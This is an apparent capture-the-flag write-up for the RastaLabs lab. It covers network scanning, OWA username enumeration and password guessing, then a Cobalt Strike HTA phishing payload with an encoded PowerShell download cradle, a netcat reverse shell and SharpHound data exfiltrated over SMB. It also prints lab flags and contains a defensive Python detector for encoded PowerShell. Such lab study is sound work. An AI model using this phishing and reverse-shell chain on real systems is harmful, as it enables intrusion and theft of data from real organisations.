Rasta


1 Flag - Humble Beginnings

Connect to the RastaLabs VPN and check the IP routing table:

➜ hackthebox ip route
default via 192.168.43.1 dev eth1 proto dhcp metric 100
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.5
10.10.110.0/24 via 10.10.14.1 dev tun0
192.168.43.0/24 dev eth1 proto kernel scope link src 192.168.43.60 metric 100
Then run an nmap scan of 10.10.110.0/24:

➜ 10.10.110.254-web01 nmap 10.10.110.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 22:26 EDT
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.110.2
Host is up (0.29s latency).
All 1000 scanned ports on 10.10.110.2 are filtered

Nmap scan report for web01.rastalabs.local (10.10.110.254)
Host is up (0.24s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 256 IP addresses (2 hosts up) scanned in 334.01 seconds


Only 10.10.110.254 has open ports, so run a full port scan with version detection and default scripts against it:

# Nmap 7.80 scan initiated Sun Jun 28 00:12:25 2020 as: nmap -sV -sC -oA scans/nmap.full -p- -T4 -v 10.10.110.254
Nmap scan report for web01.rastalabs.local (10.10.110.254)
Host is up (0.68s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5E553264E21D3BCE155802A171DE06AE
|_http-generator: Hugo 0.68.3
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: RastaLabs
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: A362D92EBBA6D2CACFEAC22FA2ECE680
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
| http-title: Outlook
|_Requested resource was https://web01.rastalabs.local/owa/auth/logon.aspx?url=https%3a%2f%2fweb01.rastalabs.local%2fowa%2f&reason=0
| ssl-cert: Subject: commonName=mx01
| Subject Alternative Name: DNS:mx01, DNS:mx01.rastalabs.local
| Issuer: commonName=mx01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-10-15T14:05:13
| Not valid after: 2022-10-15T14:05:13
| MD5: 0618 3659 6c58 f268 07d5 7fa8 4a98 6ec7
|_SHA-1: 5888 ece6 0c32 4df3 621b 3ab2 dd9e 4620 8280 713e
|_ssl-date: 2020-06-28T04:24:03+00:00; +3m03s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m02s
Visit port 80 at http://10.10.110.254/about/. The About Us page lists the employees; copy the names and build some username variations from them:

Users.txt
Rhys weston
rhys
weston
rweston
rhysw
weston rhys
westonr
rhysweston
westonrhys
eleanor pugh
pugh eleanor
epugh
pughe
pugh
eleanor
eleanorpugh
pugheleanor
nic godfrey
nicgodfrey
ngodfrey
nicg
nic
godfrey
gnic
godfreynic
amber hope
hope amber
ahope
hopea
hope
amber
ahopeamber
amberh
bradley owen
bradleyowen
owen
bradley
bradleyo
owenb
obradley
owenbradley
tami quinn
tamiq
tami
quinn
quinnt
quinntami
tamiquinn
Port 443 hosts an OWA login page.

First, verify which of these users actually exist. Metasploit has a module for this, auxiliary/scanner/http/owa_login, which reports a username as valid even when the password fails:
[+] server type: MX01
[!] No active DB -- Credential data will not be saved!
[*] 10.10.110.254:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.999779736 'RLAB\ahope' : 'ahope': SAVING TO CREDS
[*] 10.10.110.254:443 OWA - Trying hopea : hopea
So the valid user is ahope, and after some password guessing the one that works is Summer2020 for RLAB\ahope. Log in at https://10.10.110.254/owa.


The flag is in Tasks, in the task named flag.
2 Flag - The Fisherman dream
Send the mail to bowen only, follow the same process as for the 3rd flag below, and get a shell as bowen.
Then go to bowen's roaming profile directory on fs01:
PS C:\WINDOWS\system32> cd \\fs01\home$\bowen
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen> cd Desktop
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen\Desktop> ls

    Directory: \\fs01\home$\bowen\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       22/10/2017     21:18             29 flag.txt

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen\Desktop> cat flag.txt
RASTA{w007_f007h0ld_l375_pwn}

3 Flag - brave new world (2nd flag after this one)
Now I craft an HTA file that will be used to phish the users. I generated the HTA with Cobalt Strike:


<!DOCTYPE html>
<html>

<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell.exe -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA1ADoAOAAwAC8AcgBlAHYALgBwAHMAMQAnACkAKQA=", 0, true
End Function

var_func
self.close
</script>
</head>

<body>
</body>

</html>

The encoded data decodes to:

echo "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA1ADoAOAAwAC8AcgBlAHYALgBwAHMAMQAnACkAKQA=" | base64 -d
IEX ((new-object net.webclient).downloadstring('http://10.10.14.5:80/rev.ps1'))
This will execute my rev.ps1 if someone opens the HTA file. The ps1 file is:

iwr -uri http://10.10.14.5:80/nc64.exe -o /windows/tasks/nc.exe
/windows/tasks/nc.exe -e powershell.exe 10.10.14.5 1234

It downloads my nc from the Python web server and then connects back to me on port 1234.

Then send a mail to everyone containing the link to download the HTA file,

and start the Python web server in the directory holding nc64.exe, rev.ps1 and the HTA file.

Send the email, wait a while, and we get a shell as bowen or tquinn.
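From the defender's side, the chain this HTA produces (mshta.exe spawning powershell.exe -e with a base64 blob that decodes to a download cradle) is exactly what process-creation telemetry should flag. The Python below is an added example, not part of this writeup or of Cobalt Strike: it decodes the -e argument the way PowerShell does (UTF-16LE, which is why the page's base64 -d output looks like plain text only because the terminal swallows the NUL bytes) and scores constructed Sysmon-style events; the field names, sample events and the high/medium/none scoring are assumptions.

```python
import base64
import re

# The encoded command from the HTA above (UTF-16LE script, base64-encoded).
ENCODED_PS = (
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAu"
    "AGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQAL"
    "gA1ADoAOAAwAC8AcgBlAHYALgBwAHMAMQAnACkAKQA="
)

# Constructed sample events (simplified Sysmon EventID 1 fields, an assumption):
# a benign scheduled script and one matching the HTA -> PowerShell chain.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -e " + ENCODED_PS},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover the usual ones.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-and-execute cradle markers, as in the decoded command on this page.
DOWNLOAD_CRADLE = re.compile(r"downloadstring|invoke-expression|\biex\b", re.I)

def decode_encoded_command(cmdline):
    """Plaintext of a -e/-EncodedCommand argument, or None if there is none.
    PowerShell encodes the UTF-16LE bytes of the script, so decode as utf-16-le."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return (severity, decoded_script). Encoded PowerShell spawned by mshta.exe
    whose script holds a download cradle is 'high'; any other encoded command is
    'medium'; a command line without an encoded script is 'none'."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is None:
        return "none", None
    if parent == "mshta.exe" and DOWNLOAD_CRADLE.search(decoded):
        return "high", decoded
    return "medium", decoded
```

Run over SAMPLE_EVENTS, the backup script scores none and the mshta-spawned event scores high with the decoded cradle attached, which is the value worth alerting on rather than the opaque base64.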

Now download SharpHound.exe to the machine and run it from \windows\tasks (saved there so it is not interrupted):
PS C:\windows\tasks> iwr -uri http://10.10.14.5/SharpHound.exe -o sharphound.exe
Now run the binary to collect domain information over LDAP:

PS C:\windows\tasks> .\sharphound.exe /all
----------------------------------------------
Initializing SharpHound at 04:18 on 08/08/2020
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain RASTALABS.LOCAL using path CN=Schema,CN=Configuration,DC=RASTALABS,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 23 MB RAM
Status: 148 objects finished (+148 4.933333)/s -- Using 28 MB RAM
Status: 149 objects finished (+1 4.806452)/s -- Using 29 MB RAM
Enumeration finished in 00:00:31.5289398
Compressing data to .\20200808041808_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 04:18 on 08/08/2020! Happy Graphing!

PS C:\windows\tasks> ls

    Directory: C:\windows\tasks

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       08/08/2020     04:18          17868 20200808041808_BloodHound.zip
-a----       08/08/2020     04:18          30331 M2Q5Y2VhYzAtN2Q3Ni00ZmQ1LWIwNDgtMTVhNzYxZDFkZWU4.bin
-a----       08/08/2020     04:14          45272 nc.exe
-a----       08/08/2020     04:17         833536 sharphound.exe
Now we have a new zip file; get it to your machine.

Start impacket-smbserver:
➜ smb impacket-smbserver -smb2support share `pwd`
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Copy the file to the share:
PS C:\windows\tasks> copy 20200808041808_BloodHound.zip \\10.10.14.5\share
Now stop the server. You have the zip file; open it with BloodHound.

Search for tquinn or bowen (depending on whose shell you got).

We can see that the home directory is \\fs01\home$\tquinn. It is a roaming profile, so we can get to it:

PS C:\windows\tasks> cd \\fs01\home$\tquinn
cd \\fs01\home$\tquinn
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn> ls
ls

Directory: \\fs01\home$\tquinn

Mode LastWriteTime Length Name


---- ------------- ------ ----
d-r--- 19/03/2020 22:20 Desktop
d-r--- 19/03/2020 21:33 Documents
d-r--- 30/03/2020 12:25 Downloads

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn>
There is a flag on the Desktop:

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn\Desktop> cat flag.txt.txt
RASTA{br4v3_n3w_w0rld}
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn\Desktop>
